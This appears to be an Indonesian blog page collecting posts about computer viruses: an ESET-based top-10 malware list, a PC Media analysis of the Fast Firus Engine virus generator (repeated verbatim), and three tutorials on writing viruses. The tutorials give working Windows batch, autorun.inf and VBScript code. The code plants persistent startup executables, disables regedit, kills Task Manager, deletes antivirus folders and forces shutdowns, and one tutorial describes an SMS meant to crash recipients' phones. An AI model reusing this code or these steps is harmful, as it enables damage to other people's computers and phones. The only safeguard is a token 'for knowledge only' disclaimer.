daftar 10 besar virus berbahaya

Inilah 10 Virus Komputer Paling Berbahaya di Dunia dan Indonesia dalam setahun terakhir. Dimana pertumbuhan varian-varian threat atau ancaman dari virus komputer dan sejenisnya makin canggih dan meluas. Tidak hanya ditujukan untuk satu platform saja, tetapi ke sistem operasi lain selain Windows. Hal ini menjadi penyebab bertambahnya kesibukan terkait dengan dunia maya.
Level pertumbuhan ancaman dalam berbagai bentuk mencapai tingkat yang tinggi dan nyaris membahayakan kehidupan manusia bahkan diprediksi akan memicu cyber war. Virus Stuxnet, misalnya, masuk ke sistem SCADA yang biasa dipakai di berbagai fasilitas infrastruktur seperti sistem otomasi pembangkit listrik, mesin industri, dan sebagainya. Bahkan, Stuxnet menyusup pula ke kantor fasilitas nuklir Iran dan berpotensi satu kekeliruan kecil saja mungkin dapat memicu bahaya nuklir.
Berikut ini adalah 10 malware teratas yang bergentayangan di jagat maya Indonesia dan dunia yang berhasil terdeteksi oleh ESET Threat Sense Lab. Mungkin salah satu di antaranya menginfeksi komputer kita.

1. Win32/Conficker.AA Persentase Deteksi Tahun 2010: 6,85%
Win32/Conficker.AA adalah worm yang menyebar lewat folder bersama dan perangkat media bergerak. Worm ini masuk ke komputer dengan memanfaatkan kerentanan pada Server Service. Setelah Conficker.AA berhasil, komputer pengirim akan melakukan kontrol secara remote terhadap komputer korban yang telah terinfeksi lalu men-download.

2. Win32/Conficker.AE Persentase Deteksi Tahun 2010: 6,76%
Win32/Conficker.AE adalah worm yang juga merupakan salah satu varian dari Conficker.AA, dengan modus operandi penyebarannya menyerupai cara penyebaran Conficker.AA

3. Win32/Agent Persentase Deteksi Tahun 2010: 3,48%
Menurut deskripsi ESET NOD32 hasil deteksi malware ini sebagai malware generic, yang dikenal dikalangan keluarga besar malware dengan kemampuannya mencuri data milik user dari PC yang terinfeksi. Untuk melakukan hal tersebut malware biasaya akan menperbanyak dirinya kemudian menempatkan diri di dalam folder temporary dan menambahkan keys pada registry yang serupa dengan file malware tersebut atau mirip dengan file-file hasil meng-copy diri secara random itu tadi lalu menempatkan diri di folder-folder sistem operasi yang lain sehingga malware bisa “bekerja” di setiap kali sistem tersebut melakukan start up.
Malware tersebut mampu bermutasi menjadi serangkaian threat lain, penyebarannya melalui serangkaian perantara sehingga hampir tidak mungkin menghapusnya hanya dengan menggunakan satu cara saja. Untuk mencegahnya, gunakan perangkat keamanan yang baik dengan kelengkapan anti-malware, jangan lupa untuk selalu mem-patch, disable Autorun, dan yang tidak kalah penting adalah, pikir baik-baik sebelum anda meng-klik sesuatu.

4. Win32/Conficker.Gen Persentase Deteksi Tahun 2010: 3,26%
Win32/Conficker.Gen adalah salah satu varian dari Conficker yang memiliki kesamaan modus operandi dalam menginfeksi komputer korban. Demikian pula kerentanan yang dimanfaatkan juga sama yaitu kerentanan pada Server Service.

5. Win32/Conficker.X Persentase Deteksi Tahun 2010: 2,97%
Threat yang satu ini adalah worm yang menyerang komputer jaringan dan menyebar dengan memanfaatkan kerentanan pada sistem operasi Windows keluaran Microsoft. Kerentanan tersebut secara spesifik pada RPC subsystem dan dapat dimasuki secara remote oleh penyerang. Penyerang tersebut dapat melancarkan serangannya dengan tanpa menggunakan identitas yang valid. Threat ini mampu melakukan kontak dengan web server untuk men-download program-program jahat yang lainnya dengan menggunakan nama domain yang belum resmi.

6. Win32/VB Persentase Deteksi Tahun 2010: 2,74%
Worm Win32.VB dibuat dengan bahasa pemprograman Visual Basic dan mampu menyebar dengan cepat, tetapi masalah yang ditimbulkan tidak besar. Threat ini biasanya bekerja untuk menyebarkan spam. Karena risiko yang ditimbulkan tidak besar itulah, sebagian besar kasus Win32/VB bisa ditangani sendiri oleh user dengan menggunakan perangkat keamananantivirus atau menghentikan pergerakannya di corporate gateways. Malware buatan dalam negeri banyak termasuk dalam jenis ini.

7. INF/Conficker Persentase Deteksi Tahun 2010: 2,14%
INF/Conficker adalah file autorun.inf yang menyebarkan worm Conficker. Hasil deteksi juga digunakan untuk mengurai serangkaian malware yang menggunakan file autorun.inf sebagai cara untuk masuk dan menginfeksi personal computer. File tersebut berisikan informasi program yang dikembangkan untuk mampu melakukan run secara saat perangkat bergerak (misal USB flash disk) dan perangkat lain yang sejenis diakses oleh user yang menggunakan PC berbasis Windows.

8. Win32/Alman.NAB Persentase Deteksi Tahun 2010: 2,08%
Virus yang menginfeksi file-file .EXE, dan menyebar melalui media yang dipakai secara bersama dalam sebuah jaringan komputer. Saat virus aktif, virus akan men-download program-program jahat lainnya. Virus ini juga bersifat rootkit. Virus akan menyembunyikan baik proses maupun file-file yang berhubungan dengan virus tersebut. Win32/Alman.NAB juga memiliki nama lain yaitu : Downloader.Agent.LZM, Trojan.DL.Agent.UJE, Virus:W32/Alman.B, W32/Almanahe, W32/QQPass.ADW.worm, W32/Rectix.A

9. Win32/Stuxnet.A Persentase Deteksi Tahun 2010: 2,02%
Win32/Stuxnet.A adalah worm yang menyebar luas lewat perangkat media bergerak. Modus operandi penyebaran worm ini juga dengan memanfaatkan kerentanan pada sistem operasi dari komputer yang dijadikan target serangan. Kerentanan yang dimanfaatkan adalah pada CVE-2010-2568. Stuxnet adalah salah satu jenis malware dengan target tertentu (targeted malware) yang cukup populer di tahun 2010 karena mentargetkan pada sistem otomatisasi SCADA yang banyak digunakan di industri.

10. INF/Autorun.gen Persentase Deteksi Tahun 2010: 1,91%
Deteksi terhadap INF/Autorun.Gen digunakan untuk menguraikan serangkaian malware yang menggunakan file autorun sebagai cara untuk mengonfirmasi komputer-PC target yang berhasil diserang. File tersebut berisikan informasi program yang dikembangkan untuk mampu melakukan run secara saat perangkat bergerak (misal USB flash disk dan perangkat lain yang sejenis diakses oleh user yang menggunakan PC berbasis Windows. (ref.arimika.co.cc)

by Facebook Comment seperti ini , Mau ?

[Read More...]

Cara Buat Virus Sederhana Dari Notepad

dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )
ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…
note: “HANYA BEKERJA PADA WINDOWS XP”
caranya:

- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

by Facebook Comment seperti ini , Mau ?

[Read More...]

cara kerja virus

Masih ingat dengan virus Aksika? Virus “open source” yang satu itu memang memiliki banyak sekali varian. Tidak heran karena source code-nya memang disedia kan bebas di Internet, jadi siapapun dapat dengan mudah mengubah dan meng-compile source code-nya dan jadilah varian baru.

Berawal dari kemudahan itulah, banyak virus maker ataupun programer pemula mencoba–coba untuk membuat virus tanpa perlu repot. Paling yang dibutuhkan hanyalah pengetahuan seputar operating system dan programming.

Namun kemudahan itu belum seberapa, bila dibandingkan dengan menggunakan program Virus Generator. Dari namanya saja, kita sudah dapat mengira kegunaan dari program tersebut. Ya, Virus Generator merupakan program untuk dapat membuat virus secara mudah dan instan.

Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, namun antivirus lain ada juga yang menyebutnya dengan nama Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat menggunakan Virus Generator.

Fast Firus Engine (FFE)
Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan.

Virus Generator ini dibuat menggunakan bahasa Visual Basic dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe merupakan program utama dalam pembuatan virusnya dan sementara file data.ex_ sebenarnya merupakan badan virus asli yang belum dimodifi kasi.

Saat file Fast Firus Engine.exe dijalankan, maka pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda.

Cara kerja dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.

Bagaimana Virus Menginfeksi?
Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.

Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau membuat file Oeminfo.ini yang merupakan bagian dari System Properties. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated by Fast Firus Engine”.

Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi yang menggunakan nama yang sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe.

Dan tak lupa, pada root drive pun akan terdapat file dengan nama “baca euy.txt” yang berisikan pesan–pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan pada file “baca euy.txt” tersebut.

Setelah virus berhasil meng-copy-kan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan winlogon.exe. Nama process yang mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya berasal dari direktori System32.

Mengubah Registry
Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.

Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu.

Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.

Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.

Bagaimana Virus Menyebar?
Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut.

File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat.

Virus Beraksi
Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.

Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.

Pencegahan dan Penanggulangan
PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE.

by Facebook Comment seperti ini , Mau ?

[Read More...]

virus langsung

gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.
pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)
Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi . misalnya:
1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject(”WScript.Shell”).run “cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d “”1?” /f”, vbhide
sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject(”WScript.Shell”).regwriteHKEY_CURRENT_USERsoftware\microsoft\
windows\currentversion\policies\systemdisableregistrytools”, 1, “REG_DWORD”
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain
CreateObject(”Scripting.FileSystemObject”).
GetFile(WScript.ScriptFullName).Copy “c:\windows\system32\virus.vbs”
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject(”scripting.filesystemobject”).copyfile wscript.scriptfullname,
createobject(”scripting.filesystemobject”)
.getspecialfolder(1) & “\virus.vbs”
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary
3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject(”WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide
4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject(”WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs”
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)
5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” ‘(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” ‘(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject(”WScript.Shell”).run “shutdown -r -f -t 60?, vbhide
merestart windows dalam waktu 60 sekon
7.Meng-ShutDown Windows
CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60?, vbhide
mematikan windows dalam waktu 60 sekon yang beda cuman
“shutdown -s-f -t 60?
S = untuk shutdown dan
R = untuk reboot\restart
8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
‘(masukkan kode virus disini)
End if
‘misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
‘dan tahun 2012
Ok. Pelajaran bikin virus untuk hari ini saya kira udah cukup.
walaupun udah sering dibahas,, nggak papalah,,,, itung-itung
buat nambahin pengetahuan kita. dan semoga bermanfaat Dari Rizal Saputra 81

by Facebook Comment seperti ini , Mau ?

[Read More...]

virus sms

Hari ini saya akan menjelaskan kepada anda cara membuat VIRUS untuk handphone/hp, bukan VIRUS TROJAN, WAlLWARE. kenapa VIRUS yang saya buat bukan untuk komputer / PC Melainkan untuk handphone?
Nah ... Sekarang saya akan membagikan ilmu tentang cara membuat VIRUS untuk Hp, sebelumnya pernahkah anda mendapat SMS ketika anda membuka SMS tersebut dan menekan arah bawah maka handphone anda akan secara otomatis akan mati, namun VIRUS ini tidak berbahaya, silahkan copy code virus ini dan kirim ke handphone anda melalui sistem pengiriman SMS melalui internet, seperti yahoo, dll, sebenarnya di blog saya dulu ada sistem pengiriman pesan melalui internet ke Hp tetapi sudah saya hapus, karena saya tidak ingin program ini di pakai untuk menipu! Silahkan copy codedi bawah, ini type SMS yang harus anda kirim, kata-kata yang di atas bisa di ubah, tetapi jangan hapus code dan tanda enternya!
Silahkan copy dari bawah sini!


JANGAN TEKAN ARAH BAWAH, INI BUKAN SMS BIASA











_¯_¯_¯_¯ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_0



Jika ANda Bingung, download Contoh virusnya disini ,
terus pindah ke handphone anda


Nah ingat, virus ini hanya mematikan handphone teman yang di kirimi anda sms, sebenarnya program ini bisa disebut Virus tetapi saya lebih senang menyebutnya program meNON AKTIFKAN handphone tanpa menekan tombol tunoff pada hp!
Cara mengaktifkan hp kembali, anda hanya perlu mengaktifkanya kembali, tetapi virus ini hanya aktif pada handphone yang tidak memiliki pasilitas HSDP, HSDPA, yang tentunya pada hp yang tidak ada antivirusnya, minimal handphone yang gak ada cameranya,
Nah silahkan mencoba!

by Facebook Comment seperti ini , Mau ?

[Read More...]

cara membuat virus berbahaya

Masih ingat dengan virus Aksika? Virus “open source” yang satu itu memang memiliki banyak sekali varian. Tidak heran karena source code-nya memang disedia kan bebas di Internet, jadi siapapun dapat dengan mudah mengubah dan meng-compile source code-nya dan jadilah varian baru.

Berawal dari kemudahan itulah, banyak virus maker ataupun programer pemula mencoba–coba untuk membuat virus tanpa perlu repot. Paling yang dibutuhkan hanyalah pengetahuan seputar operating system dan programming.

Namun kemudahan itu belum seberapa, bila dibandingkan dengan menggunakan program Virus Generator. Dari namanya saja, kita sudah dapat mengira kegunaan dari program tersebut. Ya, Virus Generator merupakan program untuk dapat membuat virus secara mudah dan instan.

Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, namun antivirus lain ada juga yang menyebutnya dengan nama Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat menggunakan Virus Generator.

Fast Firus Engine (FFE)
Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan.

Virus Generator ini dibuat menggunakan bahasa Visual Basic dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe merupakan program utama dalam pembuatan virusnya dan sementara file data.ex_ sebenarnya merupakan badan virus asli yang belum dimodifi kasi.

Saat file Fast Firus Engine.exe dijalankan, maka pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda.

Cara kerja dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.

Bagaimana Virus Menginfeksi?
Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.

Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau membuat file Oeminfo.ini yang merupakan bagian dari System Properties. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated by Fast Firus Engine”.

Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi yang menggunakan nama yang sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe.

Dan tak lupa, pada root drive pun akan terdapat file dengan nama “baca euy.txt” yang berisikan pesan–pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan pada file “baca euy.txt” tersebut.

Setelah virus berhasil meng-copy-kan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan winlogon.exe. Nama process yang mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya berasal dari direktori System32.

Mengubah Registry
Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.

Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu.

Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.

Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.

Bagaimana Virus Menyebar?
Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut.

File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat.

Virus Beraksi
Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.

Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.
Pencegahan dan Penanggulangan
PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE.

by Facebook Comment seperti ini , Mau ?

[Read More...]